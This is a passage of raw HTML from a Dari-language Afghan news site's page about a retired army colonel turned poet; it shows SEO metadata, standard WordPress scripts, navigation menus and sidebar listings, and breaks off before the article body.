<!DOCTYPE html>
<html lang="prs-AF" itemscope itemtype="http://schema.org/Blog" prefix="og: http://ogp.me/ns#">
<head prefix="article: http://ogp.me/ns/article#" >


<!-- This site is optimized with the Yoast SEO plugin v4.9 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://tkg.af/%d9%85%d8%b1%d8%af%db%8c-%da%a9%d9%87-%d8%b2%d9%86%d8%af%d8%a7%d9%86-%d8%b4%d8%a7%d8%b9%d8%b1%d8%b4-%d8%b3%d8%a7%d8%ae%d8%aa/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="مردی که زندان شاعرش ساخت - ویب سایت خبری کلید گروپ" />
<meta property="og:description" content="دگروال متقاعد وزارت دفاع ملی، عصمت‎الله معروف‎ كه بعد از ختم دوره مكتب، پوهنتون نظامی را به سویه لیسانس به پایه اكمال رسانده است، یک شاعر بااحساس و وطن‎دوست است. او كه هشت سال می‎شود به تقاعد سوق داده شده است در این مدت مصروف عریضه‎نویسی در مقابل ساختمان وزارت معارف در شهر کابل میباشد." />
<meta property="og:url" content="http://tkg.af/%d9%85%d8%b1%d8%af%db%8c-%da%a9%d9%87-%d8%b2%d9%86%d8%af%d8%a7%d9%86-%d8%b4%d8%a7%d8%b9%d8%b1%d8%b4-%d8%b3%d8%a7%d8%ae%d8%aa/" />
<meta property="og:site_name" content="ویب سایت خبری کلید گروپ" />
<meta property="article:section" content="ادبیات" />
<meta property="article:published_time" content="۱۳۹۷-۰۴-۱۷T10:01:28+00:00" />
<meta property="og:image" content="http://tkg.af/wp-content/uploads/2018/07/عصمت-الله-معروف.jpg" />
<meta property="og:image:width" content="828" />
<meta property="og:image:height" content="1104" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="دگروال متقاعد وزارت دفاع ملی، عصمت‎الله معروف‎ كه بعد از ختم دوره مكتب، پوهنتون نظامی را به سویه لیسانس به پایه اكمال رسانده است، یک شاعر بااحساس و وطن‎دوست است. او كه هشت سال می‎شود به تقاعد سوق داده شده است در این مدت مصروف عریضه‎نویسی در مقابل ساختمان وزارت معارف در شهر کابل میباشد. " />
<meta name="twitter:title" content="مردی که زندان شاعرش ساخت - ویب سایت خبری کلید گروپ" />
<meta name="twitter:image" content="http://tkg.af/wp-content/uploads/2018/07/عصمت-الله-معروف.jpg" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="ویب سایت خبری کلید گروپ &raquo; Feed" href="http://tkg.af/feed/" />
<link rel="alternate" type="application/rss+xml" title="ویب سایت خبری کلید گروپ &raquo; Comments Feed" href="http://tkg.af/comments/feed/" />
<meta property="fb:admins" content="YOUR USER ID"/><meta property="og:title" content="مردی که زندان شاعرش ساخت"/><meta property="og:type" content="article"/><meta property="og:url" content="http://tkg.af/%d9%85%d8%b1%d8%af%db%8c-%da%a9%d9%87-%d8%b2%d9%86%d8%af%d8%a7%d9%86-%d8%b4%d8%a7%d8%b9%d8%b1%d8%b4-%d8%b3%d8%a7%d8%ae%d8%aa/"/><meta property="og:site_name" content="The Killid Group"/><meta property="og:image" content="http://tkg.af/wp-content/uploads/2018/07/عصمت-الله-معروف-225x300.jpg"/>
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/tkg.af\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b===c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='ssbaFont-css'  href='//fonts.googleapis.com/css?family=Indie+Flower&#038;ver=4.8' type='text/css' media='all' />
<script type='text/javascript' src='http://tkg.af/wp-content/themes/shark/ajaxcomments.js?ver=4.8'></script>
<script type='text/javascript' src='http://tkg.af/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://tkg.af/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='http://tkg.af/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://tkg.af/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://tkg.af/wp-includes/wlwmanifest.xml" /> 

<link rel='shortlink' href='http://tkg.af/?p=46912' />
<link rel="alternate" type="application/json+oembed" href="http://tkg.af/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftkg.af%2F%25d9%2585%25d8%25b1%25d8%25af%25db%258c-%25da%25a9%25d9%2587-%25d8%25b2%25d9%2586%25d8%25af%25d8%25a7%25d9%2586-%25d8%25b4%25d8%25a7%25d8%25b9%25d8%25b1%25d8%25b4-%25d8%25b3%25d8%25a7%25d8%25ae%25d8%25aa%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://tkg.af/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftkg.af%2F%25d9%2585%25d8%25b1%25d8%25af%25db%258c-%25da%25a9%25d9%2587-%25d8%25b2%25d9%2586%25d8%25af%25d8%25a7%25d9%2586-%25d8%25b4%25d8%25a7%25d8%25b9%25d8%25b1%25d8%25b4-%25d8%25b3%25d8%25a7%25d8%25ae%25d8%25aa%2F&#038;format=xml" />
<style type="text/css"></style><script type="text/javascript">
	window._wp_rp_static_base_url = 'https://wprp.zemanta.com/static/';
	window._wp_rp_wp_ajax_url = "http://tkg.af/wp-admin/admin-ajax.php";
	window._wp_rp_plugin_version = '3.6.4';
	window._wp_rp_post_id = '46912';
	window._wp_rp_num_rel_posts = '4';
	window._wp_rp_thumbnails = true;
	window._wp_rp_post_title = '%D9%85%D8%B1%D8%AF%DB%8C+%DA%A9%D9%87+%D8%B2%D9%86%D8%AF%D8%A7%D9%86+%D8%B4%D8%A7%D8%B9%D8%B1%D8%B4+%D8%B3%D8%A7%D8%AE%D8%AA';
	window._wp_rp_post_tags = ['%3F%3F%3F%3F%3F+%3F+%3F%3F%3F', '%3F%3F%3F', '%3F%3F%3F%3F%3F%3F', '32'];
	window._wp_rp_promoted_content = true;
</script>
<link rel="stylesheet" href="http://tkg.af/wp-content/plugins/wordpress-23-related-posts-plugin/static/themes/vertical.css?version=3.6.4" />
<style type="text/css">
.wp_rp_content{width:100%;
box-shadow: 0px 1px 4px 0px #555;
    padding: 10px 25px;
    margin: 20px 0;
}
.related_post_title {
    padding-bottom: 10px !important;
    margin: 25px 0 10px  !important;
    font-size: 18px;
    border-bottom: 1px solid #E96D23;
}
ul.related_post {
}
ul.related_post li {
width:23% !important;
}
ul.related_post li a {
}
ul.related_post li img {
width:100% !important ;height:auto !important;
}</style>
		<style type="text/css" id="wp-custom-css">
			/*
You can add your own CSS here.

Click the help icon above to learn more.
*/
		</style>
	<meta property="article:publisher" content="https://www.facebook.com/khabarnamaaf/" />
<meta property="fb:app_id" content="404990726261318" />
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>مردی که زندان شاعرش ساخت - ویب سایت خبری کلید گروپ</title>
	<link rel=stylesheet type="text/css" href="http://tkg.af/wp-content/themes/shark/css/p.css" media='print' />

<link href="http://tkg.af/wp-content/themes/shark/assets/owlcarousel2/owl.carousel.css" rel="stylesheet">
	
<link rel="icon" type="image/x-icon" href="http://tkg.af/wp-content/themes/shark/images/favicon.png" />
<link rel="icon" type="image/x-icon" href="http://tkg.af/wp-content/themes/shark/images/tkg2.png" />
<link rel="profile" href="http://gmpg.org/xfn/11" />


<!--  css files  -->
<link rel="stylesheet" type="text/css" media="all" href="http://tkg.af/wp-content/themes/shark/css/bootstrap/css/bootstrap.css" />   
<link rel="stylesheet" type="text/css" media="all" href="http://tkg.af/wp-content/themes/shark/css/bootstrap/css/bootstrap-theme.css" />
<link rel="stylesheet" type="text/css" media="all" href="http://tkg.af/wp-content/themes/shark/fonts/font-awesome/css/font-awesome.css" />
<link href="http://tkg.af/wp-content/themes/shark/css/style.css" rel="stylesheet" media="screen">
<link href="http://tkg.af/wp-content/themes/shark/css/print.css" rel="stylesheet" media="print">



<!--[if lt IE 9]>
	<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
	<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
	
</head>
<body>
<!-- navbar -->
<nav class="navbar navbar-default navbar-fixed-top" style="background:#E96D23">
	<div class="container-fluid container" id="navtop">
		<!-- Brand and toggle get grouped for better mobile display -->
		<div class="navbar-header">
			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
			<!-- <a class="navbar-brand" href="#">Brand</a> -->
		</div>

		<!-- Collect the nav links, forms, and other content for toggling -->
		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul id="menu-menu-1" class="nav navbar-nav navbar-right"><li id="menu-item-36152" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36152"><a href="http://tkg.af/%d8%b1%d8%a7%d8%af%db%8c%d9%88-%da%a9%d9%84%db%8c%d8%af-2/">رادیو کلید</a></li>
<li id="menu-item-36151" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36151"><a href="http://tkg.af/%da%a9%d8%a7%d8%a8%d9%84-%d8%b1%d8%a7%da%a9-%d8%b1%d8%a7%d8%af%db%8c%d9%88/">کابل راک رادیو</a></li>
<li id="menu-item-36150" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36150"><a href="http://tkg.af/%d9%81%d8%b5%d9%84-%d9%86%d8%a7%d9%85%d9%87-%d8%b3%d9%be%db%8c%d8%af%d9%87/">فصل نامه سپیده</a></li>
<li id="menu-item-36149" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36149"><a href="http://tkg.af/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87-%d9%85%d8%b1%d8%b3%d9%84-2/">هفته نامه مرسل</a></li>
<li id="menu-item-36148" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36148"><a href="http://tkg.af/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87-%da%a9%d9%84%db%8c%d8%af/">هفته نامه کلید</a></li>
<li id="menu-item-36147" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36147"><a href="http://tkg.af/%d8%aa%d9%85%d8%a7%d8%b3-%d8%a8%d8%a7-%d9%85%d8%a7/">تماس با ما</a></li>
<li id="menu-item-36146" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36146"><a href="http://tkg.af/?p=35877">درباره ما</a></li>
</ul>
						
			<ul class="nav navbar-nav">
				<li><a href="http://tkg.af/english/">English</a></li> 
				<li id="seprator">|</li>
				<li><a href="http://tkg.af/pashto/">پشتو</a></li>
			</ul>
		</div><!-- /.navbar-collapse -->
	</div><!-- /.container-fluid -->
	<div class="hidden-lg hidden-md hidden-sm col-xs-12">
			<div class="col-xs-6 aps" align="right"><a href="https://play.google.com/store/apps/details?id=af.techsharks.thekillidgroup" target="_blank"><img src="http://tkg.af/land/google_play.png"></a></div>
			<div class="col-xs-6 aps" align="left"><a href="https://itunes.apple.com/us/app/tkg/id1148853903" target="_blank"><img src="http://tkg.af/land/app_store.png"></a></div>
	</div>
</nav>
<!-- navbar -->
<!-- ads -->
<div class="ads">
		<div class="container">
				<div class="col-lg-5 col-xs-12" id="logo">
						<a href='http://tkg.af/'><img src="http://tkg.af/wp-content/themes/shark/images/tkg2.png"></a>
				</div>
				<div class="col-lg-7 hidden-sm hidden-xs" id="ads">
								<div id="carousel-example-generics" class="carousel slide" data-ride="carousel">
			<!-- Indicators -->
			<!-- Wrapper for slides dari -->
			<div class="carousel-inner" role="listbox">
				 <div class="item active">
					 <a href="http://tkg.af/radios/"><img src="http://tkg.af/wp-content/uploads/2016/08/Web-Banner-604X55PX.gif" width="100%" /></a>
				</div>
			</div>                 
		</div>		
		<!-- slides -->
						</div>
		</div>
</div>
<!-- ads -->
<!-- mdnav -->
<nav class="navbar navbar-default">
	<div class="container-fluid container" id="mdnav">
		<!-- Brand and toggle get grouped for better mobile display -->
		<div class="navbar-header">
			<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1l" aria-expanded="false">
				<span class="sr-only">Toggle navigation</span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
				<span class="icon-bar"></span>
			</button>
		</div>

		<!-- Collect the nav links, forms, and other content for toggling -->
		<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1l">
			<form class="navbar-form navbar-left"  action="http://tkg.af/">
				<div class="form-group">
					<input type="text" value="" name='s' class="form-control" placeholder="جستجو">
				</div>
				<span class="fa fa-search" id="search"></span>
			</form>
			
<ul id="menu-mainmenu" class="nav navbar-nav navbar-right"><li id="menu-item-36153" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36153"><a href="http://tkg.af/category/culture-and-art/">فرهنگ و هنر</a>
<ul class="sub-menu">
	<li id="menu-item-36154" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36154"><a href="http://tkg.af/category/culture-and-art/literature/">ادبیات</a></li>
	<li id="menu-item-36155" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36155"><a href="http://tkg.af/category/culture-and-art/cinema/">سینما</a></li>
	<li id="menu-item-36156" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36156"><a href="http://tkg.af/category/culture-and-art/book/">کتاب</a></li>
	<li id="menu-item-36157" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36157"><a href="http://tkg.af/category/culture-and-art/music/">موسیقی</a></li>
	<li id="menu-item-36158" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36158"><a href="http://tkg.af/category/culture-and-art/life-story/">قصه زندگی</a></li>
	<li id="menu-item-36124" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36124"><a href="http://tkg.af/category/culture-and-art/others-culture-and-art/">و مطالب دیگر فرهنگ</a></li>
</ul>
</li>
<li id="menu-item-36159" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36159"><a href="http://tkg.af/category/sport/">ورزش</a>
<ul class="sub-menu">
	<li id="menu-item-36160" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36160"><a href="http://tkg.af/category/sport/martial-art/">ورزش های رزمی</a></li>
	<li id="menu-item-36161" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36161"><a href="http://tkg.af/category/sport/football/">فوتبال</a></li>
	<li id="menu-item-36162" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36162"><a href="http://tkg.af/category/sport/cricket/">کریکت</a></li>
	<li id="menu-item-36163" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36163"><a href="http://tkg.af/category/sport/bozkashi/">بزکشی</a></li>
	<li id="menu-item-36164" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36164"><a href="http://tkg.af/category/sport/oth/">و مطالب دیگر</a></li>
</ul>
</li>
<li id="menu-item-36165" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36165"><a href="http://tkg.af/category/multimedia/">صوت و تصویر</a>
<ul class="sub-menu">
	<li id="menu-item-36166" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36166"><a href="http://tkg.af/category/multimedia/video-reports/">گزارش های ویدیویی</a></li>
</ul>
</li>
<li id="menu-item-36167" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36167"><a href="http://tkg.af/category/economy/">اقتصاد</a>
<ul class="sub-menu">
	<li id="menu-item-36168" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36168"><a href="http://tkg.af/category/economy/regeneration/">بازسازی</a></li>
	<li id="menu-item-36169" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36169"><a href="http://tkg.af/category/economy/business/">تجارت</a></li>
	<li id="menu-item-36170" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36170"><a href="http://tkg.af/category/economy/agricultural/">زراعت و باغداری</a></li>
</ul>
</li>
<li id="menu-item-36171" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36171"><a href="http://tkg.af/category/reports/">گزارش</a>
<ul class="sub-menu">
	<li id="menu-item-36172" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36172"><a href="http://tkg.af/category/reports/research/">تحقیقاتی</a></li>
	<li id="menu-item-36173" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36173"><a href="http://tkg.af/category/reports/political/">سیاسی</a></li>
	<li id="menu-item-36174" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36174"><a href="http://tkg.af/category/reports/health/">صحت</a></li>
	<li id="menu-item-36175" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36175"><a href="http://tkg.af/category/reports/environment/">محیط زیست</a></li>
	<li id="menu-item-36176" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36176"><a href="http://tkg.af/category/reports/commercial/">اقتصادی</a></li>
	<li id="menu-item-36177" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36177"><a href="http://tkg.af/category/reports/social/">اجتماعی</a></li>
	<li id="menu-item-36178" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36178"><a href="http://tkg.af/category/transitional-justice/">عدالت انتقالی</a></li>
	<li id="menu-item-36179" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36179"><a href="http://tkg.af/category/reports/special-reports/">گزارش های ویژه</a></li>
	<li id="menu-item-36180" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36180"><a href="http://tkg.af/category/reports/imc/">کنسرسیوم رسانه های آزاد</a></li>
	<li id="menu-item-36181" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36181"><a href="http://tkg.af/category/economy/others-economy/">و سایر گزارش ها</a></li>
</ul>
</li>
<li id="menu-item-36182" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36182"><a href="http://tkg.af/category/comments/">تحلیل و دیدگاه</a>
<ul class="sub-menu">
	<li id="menu-item-36183" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36183"><a href="http://tkg.af/category/comments/analysis/">تحلیل</a></li>
	<li id="menu-item-36184" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36184"><a href="http://tkg.af/category/comments/views/">دیدگاه</a></li>
	<li id="menu-item-36185" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36185"><a href="http://tkg.af/category/comments/others-comments/">و سایر مطالب</a></li>
</ul>
</li>
<li id="menu-item-36136" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36136"><a href="http://tkg.af/category/world-news/">خبرهای خارجی</a>
<ul class="sub-menu">
	<li id="menu-item-36137" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36137"><a href="http://tkg.af/category/world-news/afghanistan-neighbors-news/">همسایه های افغانستان</a></li>
	<li id="menu-item-36138" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36138"><a href="http://tkg.af/category/world-news/world-news-world-news/">منطقه و جهان</a></li>
</ul>
</li>
<li id="menu-item-36135" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-36135"><a href="http://tkg.af/category/afghanistan-news/">خبرهای داخلی</a>
<ul class="sub-menu">
	<li id="menu-item-36134" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36134"><a href="http://tkg.af/category/afghanistan-news/kabul/">کابل</a></li>
	<li id="menu-item-36133" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36133"><a href="http://tkg.af/category/afghanistan-news/south/">جنوب</a></li>
	<li id="menu-item-36132" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36132"><a href="http://tkg.af/category/afghanistan-news/southeast/">جنوب شرق</a></li>
	<li id="menu-item-36131" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36131"><a href="http://tkg.af/category/afghanistan-news/southwest/">جنوب غرب</a></li>
	<li id="menu-item-36130" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36130"><a href="http://tkg.af/category/afghanistan-news/centeral-provinces/">ساحات مرکزی</a></li>
	<li id="menu-item-36129" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36129"><a href="http://tkg.af/category/afghanistan-news/east/">شرق</a></li>
	<li id="menu-item-36128" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36128"><a href="http://tkg.af/category/afghanistan-news/north/">شمال</a></li>
	<li id="menu-item-36127" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36127"><a href="http://tkg.af/category/afghanistan-news/northeast/">شمال شرق</a></li>
	<li id="menu-item-36126" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36126"><a href="http://tkg.af/category/afghanistan-news/northwest/">شمال غرب</a></li>
	<li id="menu-item-36125" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36125"><a href="http://tkg.af/category/afghanistan-news/west/">غرب</a></li>
</ul>
</li>
<li id="menu-item-31893" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-31893"><a href="http://tkg.af">صفحه نخست</a></li>
</ul>
						
		</div><!-- /.navbar-collapse -->
	</div><!-- /.container-fluid -->
</nav>
<!-- mdnav --><!-- content -->
<div id="content">
    <div class="container white singlewhite" id="card">
        <div class="row">
        <div class="col-lg-3 col-md-3 col-sm-3 col-xs-12 hdsm"><br>
<h4 class=rdc>رادیو کلید FM 88 
	<li class="dropdown radio-list">
	<a href="#" class="dropdown-toggle arrow-down" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><span class="caret"></span></a>
	<ul class="dropdown-menu" style='top:0px'>
		<li><a onclick='player("s1.voscast.com&amp;port=7886", "رادیو کلید کابل ")' href="javascript:;">رادیو کلید کابل</a></li>
		<li><a onclick='player("s6.voscast.com&amp;port=9354", "رادیو کلید هرات ")' href="javascript:;">رادیو کلید هرات</a></li>
		<li><a onclick='player("s6.voscast.com&amp;port=9152", "رادیو کلید جلاا آباد ")' href="javascript:;">رادیو کلید جلال آباد</a></li>
		<li><a onclick='player("s6.voscast.com&amp;port=9424", "رادیو کلید کندهار ")' href="javascript:;">رادیو کلید کندهار</a></li>
		<li><a onclick='player("s6.voscast.com&amp;port=9672", "رادیو کلید مزار ")' href="javascript:;">رادیو کلید مزار</a></li>
		<li><a onclick='player("s6.voscast.com&amp;port=9676", "رادیو کلید خوست ")' href="javascript:;">رادیو کلید خوست</a></li>
		<li><a onclick='player("s1.voscast.com&amp;port=7886", "رادیو کلید غزنی ")' href="javascript:;">رادیو کلید غزنی</a></li>
	</ul>
	</li>
</h4>
<div class="aligncenter"><a href="http://tkg.af/radios/"><img src="/wp-content/themes/shark/images/Banner.gif" width="100%"></a></div>
<iframe id='radioPlayer' src="http://cdn.voscast.com/player/player.php?host=s1.voscast.com&amp;port=7886" autoplay="false" width="150" height="30" frameborder="0" scrolling="no" style='width:100%;background:#000'></iframe>
				<h4 class=graycl><a href="http://tkg.af/category/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87/"><b>هفته نامه کلید</b></a></h4>
			<div id="carousel-example-generics01" class="carousel slide" data-ride="carousel">
				<ol class="carousel-indicators" id="custm">	
									<li data-target="#carousel-example-generics01" data-slide-to="0" class="active"></li>
									<li data-target="#carousel-example-generics01" data-slide-to="1" class=""></li>
									<li data-target="#carousel-example-generics01" data-slide-to="2" class=""></li>
								</ol>
			<div class="carousel-inner" role="listbox">
									 <div class="item active">
						<a href="javascript:window.open('http://tkg.af/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87-%da%a9%d9%84%db%8c%d8%af%db%b7%db%b8%db%b6/', 'هفته نامه کلید(۷۸۶)', 'width=992,height=600,resizable=yes');"><img src="http://tkg.af/wp-content/uploads/2018/05/Killid-Cover-786-263x160.jpg" width="100%" style="height:160px">
						<div class="carousel-caption">
						هفته نامه کلید(۷۸۶)						</div>
						</a>
					</div>  
									 <div class="item ">
						<a href="javascript:window.open('http://tkg.af/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87-%da%a9%d9%84%db%8c%d8%af%db%b7%db%b8%db%b5/', 'هفته نامه کلید(۷۸۵)', 'width=992,height=600,resizable=yes');"><img src="http://tkg.af/wp-content/uploads/2018/05/Killid-Cover-263x160.jpg" width="100%" style="height:160px">
						<div class="carousel-caption">
						هفته نامه کلید(۷۸۵)						</div>
						</a>
					</div>  
									 <div class="item ">
						<a href="javascript:window.open('http://tkg.af/%d9%87%d9%81%d8%aa%d9%87-%d9%86%d8%a7%d9%85%d9%87-%da%a9%d9%84%db%8c%d8%af%db%b7%db%b8%db%b4/', 'هفته نامه کلید(۷۸۴)', 'width=992,height=600,resizable=yes');"><img src="http://tkg.af/wp-content/uploads/2018/03/7-cover-263x160.jpg" width="100%" style="height:160px">
						<div class="carousel-caption">
						هفته نامه کلید(۷۸۴)						</div>
						</a>
					</div>  
					
			</div>
		</div>
						
				<!-- tabs -->
                <div class="sidetab">
                  <!-- Nav tabs -->
                  <ul class="nav nav-tabs" role="tablist">
                    <li role="presentation" class="active"><a href="#home" aria-controls="home" role="tab" data-toggle="tab">پر بیننده ترین ها</a></li>
                    <li role="presentation"><a href="#profile" aria-controls="profile" role="tab" data-toggle="tab">فرهنگ و هنر</a></li>
                  </ul>

                    <div class="tab-content">
                            
					      
										<!-- col first  -->
                  	
                    <div role="tabpanel" class="tab-pane active" id="home">
                        <div class="row">
                          	
							 
							<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/07/نجاتی-80x60.jpg" alt="محافظان پسر سید حسین انوری یک سارنوال را در بامیان لت و کوب کردند" title="محافظان پسر سید حسین انوری یک سارنوال را در بامیان لت و کوب کردند"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d9%85%d8%ad%d8%a7%d9%81%d8%b8%d8%a7%d9%86-%d9%be%d8%b3%d8%b1-%d8%b3%db%8c%d8%af-%d8%ad%d8%b3%db%8c%d9%86-%d8%a7%d9%86%d9%88%d8%b1%db%8c-%db%8c%da%a9-%d8%b3%d8%a7%d8%b1%d9%86%d9%88%d8%a7%d9%84-%d8%b1/">محافظان پسر سید حسین انوری یک سارنوال را در بامیان لت و کوب کردند</a></h5>
                                        <p class="d">8 ساعت قبل</p>
                                    </div>
                                </div>
                            </div>
							 
							<div class="tablist">
                                <div class="row">
                                    <div class="col-lg-4 col-xs-4"><img src="http://tkg.af/wp-content/uploads/2018/07/تاپی-80x60.jpg" alt="ایران در پی سبوتاژ تاپی" title="ایران در پی سبوتاژ تاپی"  width="100%"></div>
                                    <div class="col-lg-8 col-xs-8">
                                        <h5><a href="http://tkg.af/%d8%a7%db%8c%d8%b1%d8%a7%d9%86-%d8%af%d8%b1-%d9%be%db%8c-%d8%b3%d8%a8%d9%88%d8%aa%d8%a7%da%98-%d8%aa%d8%a7%d9%be%db%8c/">ایران در پی سبوتاژ تاپی</a></h5>
                                        <p class="d">8 ساعت قبل</p>
